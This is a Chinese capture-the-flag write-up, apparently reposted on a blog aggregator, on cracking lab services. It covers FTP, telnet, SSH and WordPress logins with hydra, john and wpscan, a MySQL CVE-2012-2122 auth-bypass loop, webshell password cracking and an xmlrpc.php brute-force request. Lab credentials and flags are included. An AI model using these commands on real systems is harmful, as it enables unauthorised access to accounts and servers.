hydra暴力破解ftp-telnet-mysql-ssh-http

这篇具有很好参考价值的文章主要介绍了hydra暴力破解ftp-telnet-mysql-ssh-http。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录结构

简介:

一、FTP

1、FTP简介: FTP 是仅基于 TCP 的服务,不支持 UDP(防止丢包),与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口)。通常来说这两个端口是21(命令端口)和20(数据端口)

二、telnet

1、简介:测试连通性,也有用来管理路由交换设备的连通性,如H3C的路由器就可以实现telnet远程管理,只需要输入对应的用户名密码即可。Telnet服务器与Telnet客户端之间需要建立TCP连接,Telnet服务器的端口号为23。

三、MYSQL

1、简介:MySQL是一个关系型数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

四、登陆表单

1、简介:后台,指网站后台,有时也称为网站管理后台,是指用于管理网站前台的一系列操作,如:产品、企业信息的增加、更新、删除等。

 五、一句话密码破解

1、简介:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

六、SSH离线破解

1、简介:SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题

七、wordpress后台破解

1、简介:工具使用:WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。


简介:

        暴力破解即账号枚举,攻击者使用自己的用户名和密码字典,对目的服务器进行一个一个尝试登陆,主要字典足够强大,肯定就会猜解成功。尝试爆破成功后,为攻击者下一步渗透做准备。

一、FTP

1、FTP简介: FTP 是仅基于 TCP 的服务,不支持 UDP(防止丢包),与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口)。通常来说这两个端口是21(命令端口)和20(数据端口)

  hydra一些命令说明

通用:hydra <参数> <IP地址> <服务名>

Options(参数选项):
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

hydra -l admin -P /home/kali/top100pass.txt ftp://118.190.133.35

hydra暴力破解ftp-telnet-mysql-ssh-http

密码:zxcvbnm123

2、linux 登录 //还可以windows登录  软件登录  都可以...........

(1)ftp username:password@127.0.0.1:21 回车

(2)ftp username@127.0.0.1 回车   ##默认21端口 回车后输入密码

(3)ftp 127.0.0.1 回车   ##回车后 login 登录

(4)ftp 回车 --> open 127.0.0.1 --> login 登录

3、如果遇到中文乱码问题

set ftp:charset gbk(或者 gb2312 或 utf-8)   ##设置ftp端的编码格式

set file:charset utf-8 (...同上)        ##设置本地编码格式

4、使用ls命令 看到flag文件 然后下载

hydra暴力破解ftp-telnet-mysql-ssh-http

下载命令

lcd /home/kali                         ##存放目录 默认为 /home/kali

get 123.txt            ##下载123.txt文件到 /home/kali

hydra暴力破解ftp-telnet-mysql-ssh-http

5、得到flag 

 hydra暴力破解ftp-telnet-mysql-ssh-http

二、telnet

1、简介:测试连通性,也有用来管理路由交换设备的连通性,如H3C的路由器就可以实现telnet远程管理,只需要输入对应的用户名密码即可。Telnet服务器与Telnet客户端之间需要建立TCP连接,Telnet服务器的端口号为23。

hydra暴力破解ftp-telnet-mysql-ssh-http

2、kali打开hydra

hydra -l admin -P top100password.txt  telnet://www.whalwl.fun -s 2323

hydra暴力破解ftp-telnet-mysql-ssh-http

 3、登录

telnet www.whalwl.fun 2323

hydra暴力破解ftp-telnet-mysql-ssh-http

 4、查找flag 并查看

hydra暴力破解ftp-telnet-mysql-ssh-http

 hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{95f5353104092bc55ad0aad7defb9295}

三、MYSQL

1、简介:MySQL是一个关系型数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

hydra暴力破解ftp-telnet-mysql-ssh-http

2、利用漏洞-Mysql 身份认证绕过漏洞(CVE-2012-2122


        当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

for i in `seq 1 1000`; do mysql -uroot -paaaaa -h 118.190.133.35 -P3308 ; done
for : 利用linux的shell创造一个for循环
i : 循环的变量
seq 1 1000:表示循环是从1-1000
do:执行
mysql -uroot -paaaaa:mysql的登录命令,意思是用户名是root,密码是aaaaa
-h 118.190.133.35 -P3308:-h是IP ;-P是端口
done:表示循环结束

3、验证并登录

for ((i=1;i<1000;i++));do mysql -h 118.190.133.35 -uroot -proot -P 3308;echo $i;done

hydra暴力破解ftp-telnet-mysql-ssh-http

 4、接下来看一下表 查看

show databases;

use whalwl;

show tables;

hydra暴力破解ftp-telnet-mysql-ssh-http

5、查看flag信息

select * from flag;

 hydra暴力破解ftp-telnet-mysql-ssh-http

 得到flag{d03d4082619be132cf07aa6e2724f854}

6、打开kali采用msfconsole中的模块进行漏洞验证,然后解hash就可以看到密码,得到密码后,可以利用数据库连接工具进行连接(这里我不做演示)

使用命令:
msfcnsole        #进入msf模块
use mysql_authbypass_hashdump   #使用漏洞工具模块
show options      #查看选项
set RHOSTS   118.190.133.35   #设置目标ip
set RPORT    3308             #设置目标端口
run                           #执行

四、登陆表单

1、简介:后台,指网站后台,有时也称为网站管理后台,是指用于管理网站前台的一系列操作,如:产品、企业信息的增加、更新、删除等。

hydra暴力破解ftp-telnet-mysql-ssh-http

1、先随便填写一个账号登录,发现弹窗显示用户不存在,

hydra暴力破解ftp-telnet-mysql-ssh-http

2、再使用admin账号,密码随便填写,发现弹窗显示账号或密码错误,所以我们可先进行用户名枚举,再根据用户名来爆破密码

hydra暴力破解ftp-telnet-mysql-ssh-http

3、使用burp suite抓包,指定爆破字典,即可先后爆破出用户名 和密码

hydra暴力破解ftp-telnet-mysql-ssh-http

4、admin账户 没爆出来

hydra暴力破解ftp-telnet-mysql-ssh-http

 5、使用另外一个用户名 zachariah

hydra暴力破解ftp-telnet-mysql-ssh-http

6、同时进行爆破

hydra暴力破解ftp-telnet-mysql-ssh-http

 hydra暴力破解ftp-telnet-mysql-ssh-http

 hydra暴力破解ftp-telnet-mysql-ssh-http

7、得到密码system2021 进行登录

hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{7af9abf30e4cf730e76925bffd4340fc}

五、一句话密码破解

1、简介:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

        这里一句话破解是破解网站shell密码,所以得到网址后,我们扫描一下目录,发现存在robots.txt文件,我们打开看一下,发现存在许多文件,我发现/.webconsole.php文件最可疑,我们就从这个开始破解shell密码。这里使用到的工具是K8_FuckOneShell(扫描shell密码) 然后我们下载靶场提供的字典,把字典粘贴到K8_FuckOneShell同文件目录下。下载地址GitHub - fan-ch/K8tools at 78dd750a11258b803c2a0f1a2dcdcbffc1834148 

WgpSec PAN

里面找一下 或者全部下载 反正以后也要用
2、扫描目录 7kbscan

hydra暴力破解ftp-telnet-mysql-ssh-http

2.1dirsearch目录扫描 //kali自带

dirsearch -u ip地址

hydra暴力破解ftp-telnet-mysql-ssh-http

 也能看到有这个文件

3、 得到wenshell地址

http://118.190.133.35:8089/robots.txt

hydra暴力破解ftp-telnet-mysql-ssh-http

4、K8_FuckOneShell

hydra暴力破解ftp-telnet-mysql-ssh-http

 vvvvvvvangel

5、菜刀连接-查找flag

hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{dc6a19854e5a82ea97d486ccd98e39d0}

六、SSH离线破解

1、简介:SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题

2、下载题目的字典文件john.zip发现有两个文件 shadow和john_dict.txt使用kali自带的john爆破工具进行撞库

2、工具介绍:john(线密码破解者)
          常用命令:john --wordlist=./dict.txt ./shadow -->指定字典dict.txt爆破shadow文件。
                          john ./shadow    -->不指定字典,直接拿john提供的字典来爆破shadow文件。
                john --show ./shadow -->查上次爆破结果,在shadow文件中。 
    3、john离线爆破,或hydra在线爆破(hydra -l test -P ./pass.txt ssh://118.190.133.35:22000),成功获取密码:zmmydfz@10086
    4、使用 FinalShell 或 XShell 连接SSH,认证方式选择Keyboard Interactive。
    5、命令行窗口执行①cd ../../②ls③cat this_is_flag得到flag信息:flag{1f73c112d66b314697d68115e06c409b}23888028fc0a:/$。
    6、注(21/11/04):Linux中直接使用ssh username@ip或ssh IP也可连接,如ssh root@127.0.0.1

hydra暴力破解ftp-telnet-mysql-ssh-http

zmmydfz@10086 

 3、ssh连接

hydra暴力破解ftp-telnet-mysql-ssh-http

 4、得到flag

hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{1f73c112d66b314697d68115e06c409b}

七、wordpress后台破解

1、简介:工具使用:WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。

常用命令:

wpscan --update           #更新到最新版本
wpscan --url  http://xxxx.com    #扫描网站
wpscan --url  http://xxxx.com  --enumerate -u   #枚举wordpress用户名
#--enumerate | -e [option(s)] 枚举
u 枚举用户名,默认从1-10
u[10-20] 枚举用户名,配置从10-20
p 枚举插件
vp 只枚举有漏洞的插件
ap 枚举所有插件,时间较长
tt 列举缩略图相关的文件
t 枚举主题信息
vt 只枚举存在漏洞的主题

2、对网站用户进行枚举爆破

wpscan --url http://118.190.133.35:8090/ --enumerate u

使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
命令:wpscan –url (网站链接) –wordlist 密码文件 –username 用户名

wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt
wpscan  --url http://xxxx.com --username '用户名' -P 字典.txt #已知用户名使用字典爆破密码
wpscan  --url http://xxxx.com  -P password.txt -U username.txt  #同时爆破用户名及密码

wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt //程序会自动识别出用户名,并爆破密码

3、burp抓包 wpscan先枚举用户名 然后去登录 抓包进行密码破解就行了 都差不多文章来源地址https://www.toymoban.com/news/detail-409550.html

POST /xmlrpc.php HTTP/1.1
Host: 118.190.133.35:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
Connection: close
Upgrade-Insecure-Requests: 1
<methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value><string></string></value></param><param><value><string>whalwlweb</string></value></param><param><value><string>§123456§</string></value></param></params></methodCall>

到了这里,关于hydra暴力破解ftp-telnet-mysql-ssh-http的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali系统MSF模块暴力破解MySQL弱口令漏洞

    攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。 这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求

    2023年04月10日
    浏览(59)
  • 使用hydra进行HTTP认证破解

    hydra入门 hydra是什么 hydra的安装 hydra的基本使用 熟悉常见协议 HTTP协议 FTP协议 SSH协议 Telnet协议 熟悉hydra的参数 基本参数 高级参数 使用方法 使用hydra进行HTTP认证破解 HTTP基本认证 HTTP表单认证 HTTP COOKIES认证 使用hydra进行FTP认证破解 FTP基本认证 FTP匿名登录 使用hydra进行SSH认证

    2024年02月13日
    浏览(47)
  • 安全小课堂丨什么是暴力破解?如何防止暴力破解

    什么是暴力破解? 暴力破解也可称为穷举法、枚举法,是一种比较流行的密码破译方法,也就是将密码进行一一推算直到找出正确的密码为止。比如一个6位并且全部由数字组成的密码,可能有100万种组合,也就是说最多需要尝试100万次才能找到正确的密码,但也有可能尝试

    2024年04月28日
    浏览(51)
  • python暴力破解压缩包密码(python暴力破解zip压缩包)

    简介 : ZIP文件格式是一种数据压缩和文档储存的文件格式,原名Deflate,发明者为菲尔·卡茨(Phil Katz),他于1989年1月公布了该格式的资料。ZIP通常使用后缀名“.zip”,它的MIME格式为application/zip。当前,ZIP格式属于几种主流的压缩格式之一,其竞争者包括RAR格式以及开放源

    2024年02月03日
    浏览(60)
  • 暴力破解漏洞

    暴力破解 一、简介 1、定义 暴力破解是一种针对密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。 2、产生原因 由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息。 3、注意事项 破解器一定要有一个有效的字典,判断用户是否设置了复杂

    2024年02月01日
    浏览(46)
  • 弱口令与暴力破解

    弱口令( weak password ) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令。 公共弱口令就是常见的密码,也就是根据大量的密码数据统计得出的出现频率较高的弱口令

    2023年04月12日
    浏览(88)
  • CTF暴力破解

    题目附件解压要密码那种......密码是啥? 嗯~题目叫暴力破解,咱就听话,直接zip爆破试试。

    2024年02月11日
    浏览(32)
  • 利用暴力攻击破解登陆密码

    长久以来,入侵远程计算机系统的工具和技术并没有发生翻天覆地的变化。例如,在许多情况下,普通用户只要知道了相关密码,就能立刻变身为管理员。虽然这些情形听起来不够曲折,但在大多数情况下,暴力攻击是通过利用密码管理缺陷来入侵系统的最简单实用的方法。

    2024年02月05日
    浏览(38)
  • 暴力破解——Web安全

    原理          所谓“暴力破解” : 就是用穷举法来算,也就是说从键盘上的字母和数字一个一个的试直到找到正确的密码。         在进行暴力破解时,我们经常采用 字典 进行破解。字典就是攻击者把自己认为的正确密码,以及碰到的密码提前写入到文档里去。在进

    2024年02月09日
    浏览(50)
  • DVWA——暴力破解

    1.首先打开dvwa,usename为admin,随便写一个密码123456,先不要点login。  2.然后打开bp,进行抓包拦截。  3.然后回到dvwa,点击login。 4.回到bp,将其发至inturder和repeater,然后点击intruder。 5.查看一下对不对。  6.选择sniper狙击,然后点击clear$,清除bp自己选择的爆破位置,选择pas

    2024年02月07日
    浏览(54)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包